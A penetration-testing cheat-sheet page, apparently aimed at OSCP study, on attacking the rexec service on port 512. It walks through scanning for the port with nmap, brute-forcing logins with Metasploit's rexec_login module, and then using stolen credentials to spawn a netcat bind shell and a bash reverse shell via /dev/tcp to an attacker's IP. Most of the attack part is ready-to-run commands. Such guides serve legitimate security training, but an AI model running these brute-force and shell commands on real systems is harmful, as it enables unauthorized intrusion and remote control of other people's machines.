# Rexec - Port 512

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
  {% endtab %}
  {% endtabs %}

## Basic Info <a href="#basic-information" id="basic-information"></a>

It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).

**Default Port:** 512

```
PORT    STATE SERVICE
512/tcp open  exec
```

## Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:

```
nmap -sT -p 512 <target_ip_range>
```

This will help identify potential targets with the Rexec service running.

## Brute-Forcing Credentials

Use Metasploit's auxiliary/scanner/rservices/rexec\_login module to brute-force username and password combinations:

Load the module:

```
use auxiliary/scanner/rservices/rexec_login
```

Set the target and options, such as username and password files:

```
set RHOSTS <target_ip> 
set USER_FILE /path/to/usernames.txt 
set PASS_FILE /path/to/passwords.txt
run
```

This will attempt to find valid credentials, exploiting Rexec's clear-text password vulnerability.

## Exploiting with Command Execution

Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:

```
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
```

Then, connect to the backdoor:

```
nc -lnvp 1234
```

Alternatively, set up a reverse shell:

```
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚

</details>
{% endhint %}